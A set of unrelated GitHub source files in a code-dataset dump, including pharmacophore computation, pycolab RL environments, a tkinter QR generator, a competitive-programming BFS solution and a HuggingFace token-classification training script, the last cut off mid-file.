get_pharm_diff_Pmapper(row):\n wild = seq3(row['WILD_TYPE']).upper()\n mutant = seq3(row['MUTANT']).upper()\n return list(pharmacophore_Pmapper[mutant] - pharmacophore_Pmapper[wild])\n\n# Загружаем наш датасет с посчитанными CSM после create_CSM.py\nPDB_dataset = pd.read_csv(\"/path/to/dataset_with_CSM.csv\")\n\n# Считаем фармакофоры двумя способами\n\nPDB_dataset[\"pharmacophore_RDkit\"] = PDB_dataset.apply(get_pharm_diff_RDkit, axis=1)\nPDB_dataset[\"pharmacophore_Pmapper\"] = PDB_dataset.apply(get_pharm_diff_Pmapper, axis=1)\n\n#Сохраняем датасет с CSM и факрмакофорами\n\nPDB_dataset.to_csv(\"/path/to/folder/dataset_with_CSM_and_PH.csv\")\n", "repo_name": "biocad/CSM", "sub_path": "get_pharmacophore.py", "file_name": "get_pharmacophore.py", "file_ext": "py", "file_size_in_byte": 4258, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rdkit.RDConfig.RDDataDir", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rdkit.RDConfig", "line_number": 10, "usage_type": "name"}, {"api_name": "rdkit.Chem.ChemicalFeatures.BuildFeatureFactory", "line_number": 11, "usage_type": "call"}, {"api_name": "rdkit.Chem.ChemicalFeatures", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rdkit.Chem", "line_number": 11, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "call"}, {"api_name": "rdkit.Chem.MolFromSmiles", "line_number": 51, "usage_type": "call"}, {"api_name": "rdkit.Chem", "line_number": 51, "usage_type": "name"}, {"api_name": "rdkit.Chem.AddHs", "line_number": 52, "usage_type": "call"}, {"api_name": "rdkit.Chem", "line_number": 52, "usage_type": "name"}, {"api_name": "rdkit.Chem.AllChem.EmbedMolecule", "line_number": 53, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem", "line_number": 53, "usage_type": "attribute"}, {"api_name": "rdkit.Chem", "line_number": 53, "usage_type": "name"}, {"api_name": "pmapper.pharmacophore.Pharmacophore", "line_number": 61, "usage_type": "call"}, {"api_name": "Bio.SeqUtils.seq3", "line_number": 72, "usage_type": "call"}, {"api_name": "Bio.SeqUtils.seq3", "line_number": 73, "usage_type": "call"}, {"api_name": "Bio.SeqUtils.seq3", "line_number": 76, "usage_type": "call"}, {"api_name": "Bio.SeqUtils.seq3", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 81, "usage_type": "call"}]}
+{"seq_id": "23812329903", "text": "from copy import deepcopy\n\nimport numpy as np\n\nfrom gym import spaces\nfrom pycolab.examples.research.box_world import box_world\nfrom pycolab.examples.classics import cliff_walk\nfrom pycolab import ascii_art\n\nfrom helpers import pycolab_gymify\n\n\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Core.\n\ndef rgbify_dict(color_dict):\n \"\"\"Rescale scalar from [0, 999] interval to [0, 255] \"\"\"\n return {k: tuple([int(c / 999 * 255) for c in list(v)])\n for k, v in color_dict.items()}\n\n\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Create Pycolab environments.\n\nclass BoxWorldEnv(pycolab_gymify.PyColabEnv):\n \"\"\"Box-world environment.\n The environment was first introduced in https://arxiv.org/pdf/1806.01830.pdf,\n for Relational Reinforcement Learning.\n \"\"\"\n\n def __init__(self, default_reward=0.): # task too hard for -1 as default (reward hacking)\n \"\"\"The agent 'only actually move[s] if action is one of the 4 directions of movement'\n (comment found at: pycolab/examples/research/box_world/box_world.py#L166). We could\n ass a fifth action to enable the agent to perform a no-op action, but since only the\n agent move in this environment, there is no use for it. Thus, in accordance to\n the pycolab environment, the action space is defined as `range(4)`.\n (Note, any other action would act as a no-op.)\n\n `max_iterations` is not needed here (but signature is preserved nonetheless) since the\n pycolab environment already set the episode termination horizon with `max_num_steps`.\n\n For grid_size=12 (as pycolab's default), resize_scale=6 gives a render of size 84x84.\n For grid_size=12 (as pycolab's default), resize_scale=16 gives a render of size 224x224.\n \"\"\"\n super(BoxWorldEnv, self).__init__(max_iterations=np.infty,\n default_reward=default_reward,\n action_space=spaces.Discrete(4),\n delay=30,\n resize_scale=16)\n\n def make_game(self):\n \"\"\"Note, those are the settings from the paper.\"\"\"\n return box_world.make_game(grid_size=12,\n solution_length=(1, 2, 3, 4),\n num_forward=(0, 1, 2, 3, 4),\n num_backward=(0,),\n branch_length=1,\n random_state=None,\n max_num_steps=120)\n\n def make_colors(self):\n \"\"\"Return the color dictionary defined in the pycolab environment.\n Note, need to transform it to RGB format for proper rendering.\n \"\"\"\n color_dict = deepcopy(box_world.OBJECT_COLORS)\n return rgbify_dict(color_dict)\n\n\nclass CliffWalkEnv(pycolab_gymify.PyColabEnv):\n \"\"\"Classic cliff-walk game.\"\"\"\n\n def __init__(self, max_iterations, default_reward=-1.):\n super(CliffWalkEnv, self).__init__(max_iterations=max_iterations,\n default_reward=default_reward,\n action_space=spaces.Discrete(4),\n delay=30,\n resize_scale=24)\n\n def make_game(self):\n \"\"\"Reimplemention of the game map.\"\"\"\n # We modify the game art to make the cliff section visual discernible.\n BOOTLEG_GAME_ART = ['......',\n '......',\n 'Pxxxx.']\n return ascii_art.ascii_art_to_game(BOOTLEG_GAME_ART,\n what_lies_beneath='.',\n sprites={'P': cliff_walk.PlayerSprite})\n\n def make_colors(self):\n return {'.': (192, 192, 192),\n 'P': (127, 0, 255),\n 'x': (0, 0, 0)}\n\n\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Create environment maker.\n\ndef make_pycolab(env_id):\n if env_id == 'BoxWorld-v0':\n return BoxWorldEnv()\n elif env_id == 'CliffWalk-v0':\n return CliffWalkEnv(max_iterations=150)\n else:\n pass\n", "repo_name": "lionelblonde/ppo-gail-pytorch", "sub_path": "helpers/pycolab_envs.py", "file_name": "pycolab_envs.py", "file_ext": "py", "file_size_in_byte": 4199, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "helpers.pycolab_gymify.PyColabEnv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "helpers.pycolab_gymify", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.infty", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gym.spaces.Discrete", "line_number": 45, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 45, "usage_type": "name"}, {"api_name": "pycolab.examples.research.box_world.box_world.make_game", "line_number": 51, "usage_type": "call"}, {"api_name": "pycolab.examples.research.box_world.box_world", "line_number": 51, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 63, "usage_type": "call"}, {"api_name": "pycolab.examples.research.box_world.box_world.OBJECT_COLORS", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pycolab.examples.research.box_world.box_world", "line_number": 63, "usage_type": "name"}, {"api_name": "helpers.pycolab_gymify.PyColabEnv", "line_number": 67, "usage_type": "attribute"}, {"api_name": "helpers.pycolab_gymify", "line_number": 67, "usage_type": "name"}, {"api_name": "gym.spaces.Discrete", "line_number": 73, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 73, "usage_type": "name"}, {"api_name": "pycolab.ascii_art.ascii_art_to_game", "line_number": 83, "usage_type": "call"}, {"api_name": "pycolab.ascii_art", "line_number": 83, "usage_type": "name"}, {"api_name": "pycolab.examples.classics.cliff_walk.PlayerSprite", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pycolab.examples.classics.cliff_walk", "line_number": 85, "usage_type": "name"}]}
+{"seq_id": "34844813451", "text": "#LIBRARIES USED\nimport qrcode\nfrom tkinter import *\nfrom tkinter import messagebox\n\n#CREATING THE WINDOW\nwn = Tk()\nwn.title('QR CODE GENERATOR')\nwn.geometry('700x700')\nwn.config(bg = 'SteelBlue3')\n\n#FUNCTIONS\ndef generateCode():\n #creating QR\n qr = qrcode.QRCode(version = size.get(),\n box_size=10,\n border=5)\n qr.add_data(text.get())\n qr.make(fit=True)\n img = qr.make_image()\n fileDirec = loc.get()+'\\\\'+name.get()\n img.save(f'{fileDirec}.png')\n messagebox.showinfo(\"QR CODE GENERATED,\",\"QR CODE SAVED SUCCESSFULLY\")\n\n#Labels\nheadingFrame = Frame(wn,bg=\"azure\",bd=5)\nheadingFrame.place(relx=0.15,rely=0.05,relwidth=0.7,relheight=0.1)\nheadingLabel = Label(headingFrame,text=\"GENERATE QR CODE WITH THIS\",bg='azure',font=('Times',20,'bold'))\nheadingLabel.place(relx=0,rely=0,relwidth=1,relheight=1)\n\n#TAKE INPUT IN FORM\nFrame1 = Frame(wn,bg=\"SteelBlue3\")\nFrame1.place(relx=0.1,rely=0.15,relwidth=0.7,relheight=0.3)\n\nlabel1= Label(Frame1,text=\"ENTER TEXT OR URL: \",bg=\"SteelBlue3\",fg='azure',font=('Courier',13,'bold'))\nlabel1.place(relx=0.05,rely=0.2,relheight=0.08)\n\ntext = Entry(Frame1,font=('Century 12'))\ntext.place(relx=0.05,rely=0.4,relwidth=1,relheight=0.2)\n\n#GETTING INPUT OF QR SAVE LOCATION\nFrame2 = Frame(wn,bg=\"SteelBlue3\")\nFrame2.place(relx=0.1,rely=0.35,relwidth=0.7,relheight=0.3)\n\nlabel2 = Label(Frame2,text=\"Enter The Location To Save The QR\",bg=\"SteelBlue3\",fg='azure',font=('Courier',13,'bold'))\nlabel2.place(relx=0.05,rely=0.2,relheight=0.08)\n\nloc = Entry(Frame2,font=('Century 12'))\nloc.place(relx=0.05,rely=0.4,relwidth=1,relheight=0.2)\n\n#GETTING INPUT QR CODE IMAGE NAME\nFrame3 = Frame(wn,bg=\"SteelBlue3\")\nFrame3.place(relx=0.1,rely=0.55,relwidth=0.7,relheight=0.3)\n\nlabel3 = Label(Frame3,text=\"Enter The Name Of The QR CODE\",bg=\"SteelBlue3\",fg='azure',font=('Courier',13,'bold'))\nlabel3.place(relx=0.05,rely=0.2,relheight=0.08)\n\nname = Entry(Frame3,font=('Century 12'))\nname.place(relx=0.05,rely=0.4,relwidth=1,relheight=0.2)\n\n#Getting The Input FOR QR CODE SIZE\nFrame4 = Frame(wn,bg=\"SteelBlue3\")\nFrame4.place(relx=0.1,rely=0.75,relwidth=0.7,relheight=0.2)\n\nlabel4 = Label(Frame4,text=\"Enter The Size From 1 to 40, With 1 being 21x21: \",bg=\"SteelBlue3\",fg='azure',font=('Courier',13,'bold'))\nlabel4.place(relx=0.05,rely=0.2,relheight=0.2)\n\nsize = Entry(Frame4,font=('Century 12'))\nsize.place(relx=0.05,rely=0.4,relwidth=0.5,relheight=0.2)\n\n#Buttons TO GENERATE AND SAVE\nbutton = Button(wn,text=\"Generate CODE\",font=('Courier',15,'normal'),command=generateCode)\nbutton.place(relx=0.35,rely=0.9,relwidth=0.25,relheight=0.05)\n\n#RUNS UNTIL CLOSED MANUALLY\nwn.mainloop()\n\n", "repo_name": "Novelzalsastian/QRCODE_Generator", "sub_path": "QRCODE_READER.py", "file_name": "QRCODE_READER.py", "file_ext": "py", "file_size_in_byte": 2660, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "qrcode.QRCode", "line_number": 15, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 23, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 23, "usage_type": "name"}]}
+{"seq_id": "26109568295", "text": "import os\nimport logging\n\nPARAM_FNAME = 'param.txt'\n\n\ndef read_params(user_dir):\n '''read last used source and dest params.\n\n '''\n params = dict(source='', dest1='', dest2='')\n\n param_file = os.path.join(user_dir, PARAM_FNAME)\n try:\n with open(param_file, 'r') as fout:\n content = fout.read().strip('\\n')\n params['source'], params['dest1'], params['dest2'] = content.split(\n \";\")\n\n # Do not load folders that no longer exist.\n for key, val in params.items():\n if val != '' and not os.path.exists(val):\n params[key] = ''\n\n except Exception as err:\n logging.getLogger(__name__).debug(\n 'Could not read parameters from %s. Error: %s', param_file,\n str(err))\n return params\n\n\ndef dump_params(user_dir, source, dest1, dest2):\n '''write last source and dest params\n\n '''\n delimiter = ';'\n param_file = os.path.join(user_dir, PARAM_FNAME)\n\n logging.getLogger(__name__).debug('Writing user params to %s', param_file)\n try:\n with open(param_file, 'w') as fout:\n fout.write(delimiter.join([source, dest1, dest2]))\n except Exception as err:\n logging.getLogger(__name__).error(\n 'Could not write parameters to %s. Error: %s', param_file,\n str(err))\n", "repo_name": "fmi-basel/faim-robocopy", "sub_path": "faim_robocopy/params.py", "file_name": "params.py", "file_ext": "py", "file_size_in_byte": 1339, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 44, "usage_type": "call"}]}
+{"seq_id": "13201506545", "text": "import sys\nfrom collections import deque\n\nN = int(sys.stdin.readline())\npath = []\nvisited = []\nfor i in range(N):\n temp = list(map(int, sys.stdin.readline().split()))\n path.append(temp[:])\n visited.append(temp[:])\n\ndeq = deque()\ndx = [-1, 0, 0, 1]\ndy = [0, -1, 1, 0]\n\ncur_size = 2\neaten = 0\nans = 0\n\nfor i in range(N):\n for j in range(N):\n if path[i][j] == 9:\n path[i][j] = 0\n deq.append((i, j, 1))\nwhile True:\n food = []\n while len(deq) != 0:\n temp = deq.popleft()\n x, y, cnt = temp[0], temp[1], temp[2]\n if visited[x][y] < 0:\n continue\n visited[x][y] = -cnt\n\n # handle when found\n if 0 < path[x][y] < cur_size:\n food.append((x, y))\n\n for i in range(4):\n nx, ny = x + dx[i], y + dy[i]\n\n if 0 <= nx < N and 0 <= ny < N and path[nx][ny] <= cur_size:\n deq.append((nx, ny, cnt + 1))\n\n ################ end of while ###############\n\n if len(food) == 0:\n break\n shortest = [food[0][0], food[0][1]]\n cur = -visited[food[0][0]][food[0][1]]\n for i in food[1:]:\n x, y = i[0], i[1]\n if -visited[x][y] < cur:\n cur = -visited[x][y]\n elif -visited[x][y] == cur:\n if x < shortest[0]:\n shortest[0] = x\n shortest[1] = y\n elif x == shortest[0] and y < shortest[1]:\n shortest[1] = y\n\n x, y = shortest[0], shortest[1]\n path[x][y] = 0\n deq.clear()\n deq.append((x, y, 1))\n ans += -visited[x][y] - 1\n\n for i in range(N):\n for j in range(N):\n visited[i][j] = 0\n\n eaten += 1\n if cur_size == eaten:\n cur_size += 1\n eaten = 0\n\nprint(ans)", "repo_name": "mushroom1324/Algorithm", "sub_path": "BOJ_16236.py", "file_name": "BOJ_16236.py", "file_ext": "py", "file_size_in_byte": 1743, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.stdin.readline", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.stdin.readline", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 8, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "14544381446", "text": "import json\nimport sys\nimport pandas as pd\nfrom handlers.dataHandler import dataHandler\nfrom datetime import datetime, timedelta\n\n# load config file\ntry:\n with open('config.json') as configFile:\n config = json.load(configFile)\n print(\"Config file loaded\")\nexcept:\n print(\"Failed to load config file\")\n sys.exit(\"Terminating program\")\n\n# Initialize the debug object if debugging is enabled\nif config['debugMode']:\n debugDict = {}\n debugDict['config'] = config\n\n# Initialize and load the data\ndata = dataHandler(config)\ndata.loadData()\n\ndef main(): \n if config['serverMode'] == 'flask':\n count = 0\n import interfaces.flaskInterface as fI \n fI.api.add_resource(fI.BaseTime, '/', \n resource_class_kwargs={'mainConfig': config, 'data': data,\n 'debugDict': debugDict, 'count': count})\n fI.app.run(host=config['flaskHostName'], port=config['flaskPort'])\n if config['serverMode'] == 'bacnet': \n import interfaces.bacnetInterface as bI \n bI.main(data, config)\n \nif __name__ == \"__main__\":\n main()", "repo_name": "jkimmerling/Simulacra", "sub_path": "runner.py", "file_name": "runner.py", "file_ext": "py", "file_size_in_byte": 1138, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.load", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 14, "usage_type": "call"}, {"api_name": "handlers.dataHandler.dataHandler", "line_number": 22, "usage_type": "call"}, {"api_name": "interfaces.flaskInterface.api.add_resource", "line_number": 29, "usage_type": "call"}, {"api_name": "interfaces.flaskInterface.api", "line_number": 29, "usage_type": "attribute"}, {"api_name": "interfaces.flaskInterface", "line_number": 29, "usage_type": "name"}, {"api_name": "interfaces.flaskInterface.BaseTime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "interfaces.flaskInterface.app.run", "line_number": 32, "usage_type": "call"}, {"api_name": "interfaces.flaskInterface.app", "line_number": 32, "usage_type": "attribute"}, {"api_name": "interfaces.flaskInterface", "line_number": 32, "usage_type": "name"}, {"api_name": "interfaces.bacnetInterface.main", "line_number": 35, "usage_type": "call"}, {"api_name": "interfaces.bacnetInterface", "line_number": 35, "usage_type": "name"}]}
+{"seq_id": "13663500590", "text": "__author__ = 'haseeb'\nimport os\nfrom PIL import Image as im\nfrom PIL import Image\nfrom matplotlib import pyplot\nimport numpy as np\n\nimages = \"images_list.txt\"\noutput1 = \"resized1.png\"\noutput2 = \"resized2.png\"\n\nw = 512\nh = 512\n\n\ndef resize():\n scaler = Image.ANTIALIAS\n images_list_file = open(images, 'r')\n for image_file in images_list_file:\n image_file = image_file[:-1]\n image = im.open(image_file)\n image_res = image.resize((w,h), scaler)\n image_res.save(output2)\n\nif __name__ == '__main__':\n resize()", "repo_name": "omarelshenawy/SpeechRecognitionCourse", "sub_path": "parse_timit/scripts/resize.py", "file_name": "resize.py", "file_ext": "py", "file_size_in_byte": 546, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PIL.Image.ANTIALIAS", "line_number": 17, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 17, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "name"}]}
+{"seq_id": "27553522719", "text": "import logging\nimport os\nfrom pathlib import Path\nimport sys\nfrom dataclasses import dataclass, field\nfrom typing import List, Optional\nimport json\n\nimport numpy as np\nfrom datasets import load_dataset\nfrom sklearn.metrics import accuracy_score, precision_recall_fscore_support\n\nimport transformers\nfrom transformers import (\n AutoConfig,\n AutoModelForTokenClassification,\n AutoTokenizer,\n DataCollatorForTokenClassification,\n HfArgumentParser,\n PreTrainedTokenizerFast,\n TrainingArguments,\n set_seed,\n)\nfrom transformers.trainer_utils import is_main_process\n\nfrom .trainer import Trainer\nfrom .utils import LABEL_SETS\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass ModelArguments:\n \"\"\"\n Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.\n \"\"\"\n\n model_name_or_path: str = field(\n metadata={\n \"help\":\n \"Path to pretrained model or model identifier from huggingface.co/models\"\n })\n config_name: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"Pretrained config name or path if not the same as model_name\"\n })\n tokenizer_name: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"Pretrained tokenizer name or path if not the same as model_name\"\n })\n cache_dir: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"Where do you want to store the pretrained models downloaded from huggingface.co\"\n },\n )\n freeze_layers: Optional[List[str]] = field(\n default=None, metadata={\"help\": \"Which layer(s) to freeze\"})\n\n\n@dataclass\nclass DataTrainingArguments:\n \"\"\"\n Arguments pertaining to what data we are going to input our model for training and eval.\n \"\"\"\n\n task_name: Optional[str] = field(\n default=\"pos\",\n metadata={\"help\": \"The name of the task (ner, pos...).\"})\n dataset_name: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"The name of the dataset to use (via the datasets library).\"\n })\n dataset_config_name: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"The configuration name of the dataset to use (via the datasets library).\"\n })\n train_file: Optional[str] = field(\n default=None,\n metadata={\n \"help\": \"The input training data file (a csv or JSON file).\"\n })\n validation_file: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"An optional input evaluation data file to evaluate on (a csv or JSON file).\"\n },\n )\n test_file: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"An optional input test data file to predict on (a csv or JSON file).\"\n },\n )\n overwrite_cache: bool = field(\n default=False,\n metadata={\"help\": \"Overwrite the cached training and evaluation sets\"})\n preprocessing_num_workers: Optional[int] = field(\n default=None,\n metadata={\n \"help\": \"The number of processes to use for the preprocessing.\"\n },\n )\n pad_to_max_length: bool = field(\n default=False,\n metadata={\n \"help\":\n \"Whether to pad all samples to model maximum sentence length. \"\n \"If False, will pad the samples dynamically when batching to the maximum length in the batch. More \"\n \"efficient on GPU but very bad for TPU.\"\n },\n )\n label_all_tokens: bool = field(\n default=False,\n metadata={\n \"help\":\n \"Whether to put the label for one word on all tokens of generated by that word or just on the \"\n \"one (in which case the other tokens will have a padding index).\"\n },\n )\n\n def __post_init__(self):\n if self.dataset_name is None and self.train_file is None and self.validation_file is None:\n raise ValueError(\n \"Need either a dataset name or a training/validation file.\")\n else:\n if self.train_file is not None:\n extension = self.train_file.split(\".\")[-1]\n assert extension in [\n \"csv\", \"json\"\n ], \"`train_file` should be a csv or a json file.\"\n if self.validation_file is not None:\n extension = self.validation_file.split(\".\")[-1]\n assert extension in [\n \"csv\", \"json\"\n ], \"`validation_file` should be a csv or a json file.\"\n self.task_name = self.task_name.lower()\n\n\ndef load_args():\n v_path = Path(sys.argv[1])\n d_path = Path(sys.argv[2])\n\n v_name = v_path.name.split('.')[0]\n d_name = d_path.name.split('.')[0]\n\n with open(v_path) as f:\n args = json.load(f)\n with open(d_path) as f:\n args.update(json.load(f))\n\n while (v_path.parent / 'config.json').exists():\n v_path = v_path.parent\n print(v_path)\n args_ = args\n with open(v_path / 'config.json') as f:\n args = json.load(f)\n args.update(args_)\n\n args['output_dir'] = os.path.join(args['output_dir'], v_name, d_name)\n if os.path.exists(args['output_dir']) and args['overwrite_output_dir']:\n ckpt = 0\n\n for ckpt_path in Path(args['output_dir']).glob('checkpoint-*'):\n this_ckpt = int(ckpt_path.name.split('-')[-1])\n if this_ckpt > ckpt:\n ckpt = this_ckpt\n\n if ckpt == 0:\n print('output dir exists, but does not contain a checkpoint')\n exit(1)\n ckpt_dir = os.path.join(args['output_dir'], f'checkpoint-{ckpt}')\n print('WARNING: continuing training', ckpt_dir)\n args['model_name_or_path'] = ckpt_dir\n return args\n\n\ndef main():\n # See all possible arguments in src/transformers/training_args.py\n # or by passing the --help flag to this script.\n # We now keep distinct sets of args, for a cleaner separation of concerns.\n\n parser = HfArgumentParser(\n (ModelArguments, DataTrainingArguments, TrainingArguments))\n\n args = load_args()\n model_args, data_args, training_args = parser.parse_dict(args)\n\n if (os.path.exists(training_args.output_dir)\n and os.listdir(training_args.output_dir) and training_args.do_train\n and not training_args.overwrite_output_dir):\n raise ValueError(\n f\"Output directory ({training_args.output_dir}) already exists and is not empty.\"\n \"Use --overwrite_output_dir to overcome.\")\n\n # Setup logging\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO\n if is_main_process(training_args.local_rank) else logging.WARN,\n )\n\n # Log on each process the small summary:\n logger.warning(\n f\"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}\"\n +\n f\"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}\"\n )\n # Set the verbosity to info of the Transformers logger (on main process only):\n if is_main_process(training_args.local_rank):\n transformers.utils.logging.set_verbosity_info()\n transformers.utils.logging.enable_default_handler()\n transformers.utils.logging.enable_explicit_format()\n logger.info(\"Training/evaluation parameters %s\", training_args)\n\n # Set seed before initializing model.\n set_seed(training_args.seed)\n\n # Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below)\n # or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/\n # (the dataset will be downloaded automatically from the datasets Hub).\n #\n # For CSV/JSON files, this script will use the column called 'text' or the first column if no column called\n # 'text' is found. You can easily tweak this behavior (see below).\n #\n # In distributed training, the load_dataset function guarantee that only one local process can concurrently\n # download the dataset.\n if data_args.dataset_name is not None:\n # Downloading and loading a dataset from the hub.\n datasets = load_dataset(data_args.dataset_name,\n data_args.dataset_config_name)\n else:\n data_files = {}\n if data_args.train_file is not None:\n data_files[\"train\"] = data_args.train_file\n if data_args.validation_file is not None:\n data_files[\"validation\"] = data_args.validation_file\n if data_args.test_file is not None:\n data_files[\"test\"] = data_args.test_file\n extension = data_args.train_file.split(\".\")[-1]\n datasets = load_dataset(extension, data_files=data_files)\n # See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at\n # https://huggingface.co/docs/datasets/loading_datasets.html.\n\n if training_args.do_train:\n column_names = datasets[\"train\"].column_names\n else:\n column_names = datasets[\"validation\"].column_names\n text_column_name = \"tokens\" if \"tokens\" in column_names else column_names[0]\n label_column_name = (f\"{data_args.task_name}_tags\"\n if f\"{data_args.task_name}_tags\" in column_names else\n column_names[1])\n\n label_names = LABEL_SETS[data_args.task_name]\n id2label = dict(enumerate(label_names))\n label2id = {l: i for i, l in id2label.items()}\n\n # Load pretrained model and tokenizer\n #\n # Distributed training:\n # The .from_pretrained methods guarantee that only one local process can concurrently\n # download model & vocab.\n config = AutoConfig.from_pretrained(\n model_args.config_name\n if model_args.config_name else model_args.model_name_or_path,\n id2label=id2label,\n label2id=label2id,\n finetuning_task=data_args.task_name,\n cache_dir=model_args.cache_dir,\n )\n tokenizer = AutoTokenizer.from_pretrained(\n model_args.tokenizer_name\n if model_args.tokenizer_name else model_args.model_name_or_path,\n cache_dir=model_args.cache_dir,\n use_fast=True,\n )\n model = AutoModelForTokenClassification.from_pretrained(\n model_args.model_name_or_path,\n from_tf=bool(\".ckpt\" in model_args.model_name_or_path),\n config=config,\n cache_dir=model_args.cache_dir,\n )\n\n # Freeze layers\n if model_args.freeze_layers is not None:\n for name, p in model.named_parameters():\n if name in model_args.freeze_layers:\n p.requires_grad = False\n continue\n for lay_name in model_args.freeze_layers:\n if name.startswith(f'{lay_name}.'):\n p.requires_grad = False\n break\n\n # for name, param in model.named_parameters():\n # print(name, param.requires_grad)\n # exit(0)\n\n # Tokenizer check: this script requires a fast tokenizer.\n if not isinstance(tokenizer, PreTrainedTokenizerFast):\n raise ValueError(\n \"This example script only works for models that have a fast tokenizer. Checkout the big table of models \"\n \"at https://huggingface.co/transformers/index.html#bigtable to find the model types that meet this \"\n \"requirement\")\n\n # Preprocessing the dataset\n # Padding strategy\n padding = \"max_length\" if data_args.pad_to_max_length else False\n\n # Tokenize all texts and align the labels with them.\n def tokenize_and_align_labels(examples):\n tokenized_inputs = tokenizer(\n examples[text_column_name],\n padding=padding,\n truncation=True,\n # We use this argument because the texts in our dataset are lists of words (with a label for each word).\n is_split_into_words=True,\n )\n labels = []\n for i, label in enumerate(examples[label_column_name]):\n word_ids = tokenized_inputs.word_ids(batch_index=i)\n previous_word_idx = None\n label_ids = []\n for word_idx in word_ids:\n # Special tokens have a word id that is None. We set the label to -100 so they are automatically\n # ignored in the loss function.\n if word_idx is None:\n label_ids.append(-100)\n # We set the label for the first token of each word.\n elif word_idx != previous_word_idx:\n label_ids.append(label2id[label[word_idx]])\n # For the other tokens in a word, we set the label to either the current label or -100, depending on\n # the label_all_tokens flag.\n else:\n label_ids.append(label2id[label[word_idx]] if data_args.\n label_all_tokens else -100)\n previous_word_idx = word_idx\n\n labels.append(label_ids)\n tokenized_inputs[\"labels\"] = labels\n return tokenized_inputs\n\n tokenized_datasets = datasets.map(\n tokenize_and_align_labels,\n batched=True,\n num_proc=data_args.preprocessing_num_workers,\n load_from_cache_file=not data_args.overwrite_cache,\n )\n\n # Data collator\n data_collator = DataCollatorForTokenClassification(tokenizer)\n\n # Metrics\n def compute_metrics(p):\n predictions, labels = p\n predictions = np.argmax(predictions, axis=2)\n\n # Remove ignored index (special tokens)\n true_predictions = [\n id2label[p] for prediction, label in zip(predictions, labels)\n for (p, lab) in zip(prediction, label) if lab != -100\n ]\n true_labels = [\n id2label[lab] for prediction, label in zip(predictions, labels)\n for (_, lab) in zip(prediction, label) if lab != -100\n ]\n\n mip, mir, mif, _ = precision_recall_fscore_support(true_labels,\n true_predictions,\n labels=label_names,\n average='micro')\n map, mar, maf, _ = precision_recall_fscore_support(true_labels,\n true_predictions,\n labels=label_names,\n average='macro')\n p, r, f, _ = precision_recall_fscore_support(true_labels,\n true_predictions,\n labels=label_names,\n average=None)\n\n res = {\n 